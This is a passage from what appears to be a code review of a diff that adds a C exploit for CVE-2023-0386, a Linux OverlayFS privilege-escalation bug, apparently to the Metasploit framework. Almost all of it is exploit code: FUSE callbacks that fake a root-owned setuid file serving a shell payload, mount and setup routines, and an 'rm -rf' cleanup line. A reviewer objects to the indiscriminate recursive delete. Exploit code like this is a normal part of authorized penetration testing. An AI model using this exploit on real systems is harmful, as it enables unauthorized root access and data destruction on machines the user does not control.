external/source/exploits/CVE-2023-0386/exploit.c

```diff
@@ -0,0 +1,215 @@
+    memset(stbuf, 0, sizeof(struct stat));
+
+    if (strcmp(path, "/file") == 0)
+    {
+        printf("%s\n", path);
+        stbuf->st_mode = S_IFREG | 04777;
+        stbuf->st_nlink = 1;
+        stbuf->st_uid = 0;
+        stbuf->st_gid = 0;
+        stbuf->st_size = sizeof(shell);
+        return 0;
+    }
+    else if (strcmp(path, "/") == 0)
+    {
+        printf("%s\n", path);
+        stbuf->st_mode = S_IFDIR | 0777;
+        stbuf->st_nlink = 2;
+        stbuf->st_uid = 1000;
+        stbuf->st_gid = 1000;
+        return 0;
+    }
+    return -ENOENT;
+}
+
+static int open_callback(const char *path, struct fuse_file_info *fi)
+{
+    printf("%s\n", "[+] open_callback");
+    printf("%s\n", path);
+    if (strcmp(path, "file") == 0)
+    {
+        int fd = open("", fi->flags);
+
+        return -errno;
+    }
+    return 0;
+}
+
+static int read_callback(const char *path,
+                         char *buf, size_t size, off_t offset,
+                         struct fuse_file_info *fi)
+{
+    printf("%s\n", "[+] read_callback");
+    printf("    path  : %s\n", path);
+    printf("    size  : 0x%lx\n", size);
+    printf("    offset: 0x%lx\n", offset);
+    char tmp;
+    if (strcmp(path, "/file") == 0)
+    {
+        size_t len = sizeof(shell);
+        if (offset >= len)
+            return 0;
+        if ((size > len) || (offset + size > len))
+        {
+            memcpy(buf, shell + offset, len - offset);
+            return len - offset;
+        }
+        else
+        {
+            memcpy(buf, shell + offset, size);
+            return size;
+        }
+    }
+    return -ENOENT;
+}
+
+
+// needed for touch
+static int ioctl_callback(const char *p, int cmd, void *arg,
+                          struct fuse_file_info *fi, unsigned int flags, void *data)
+{
+    printf("%s\n", "[+] ioctl callback");
+    printf("path %s\n", p);
+    printf("cmd 0x%x\n", cmd);
+    return 0;
+}
+
+static int readdir_callback(const char *path, void *buf, fuse_fill_dir_t filler, off_t offset, struct fuse_file_info *fi)
+{
+    printf("%s\n", "[+] readdir");
+    filler(buf, "file", NULL, 0);
+    return 0;
+}
+
+static struct fuse_operations fops = {
+    .getattr = getattr_callback,
+    .open = open_callback,
+    .read = read_callback,
+    .ioctl = ioctl_callback,
+    .readdir = readdir_callback,
+};
+
+void start_fuse()
+{
+    struct fuse_args args = FUSE_ARGS_INIT(0, NULL);
+    struct fuse_chan *chan;
+    struct fuse *fuse;
+
+    if (!(chan = fuse_mount(DIR_LOWER, &args)))
+        fatal("fuse_mount");
+
+    if (!(fuse = fuse_new(chan, &args, &fops, sizeof(fops), NULL)))
+    {
+        fuse_unmount(DIR_LOWER, chan);
+        fatal("fuse_new");
+    }
+
+    fuse_set_signal_handlers(fuse_get_session(fuse));
+    fuse_loop_mt(fuse);
+    fuse_unmount(DIR_LOWER, chan);
+}
+
+void preps()
+{
+    char buf[4096];
+    if (mkdir(DIR_BASE, 0777))
+        perror("mkdir");
+    sprintf(buf, "rm -rf %s/*", DIR_BASE);
```

Comment:
Please don't recursively delete files indiscriminate. We aren't systemd.

```suggestion
    sprintf(buf, "rm -rf '%s/*'", DIR_BASE);
```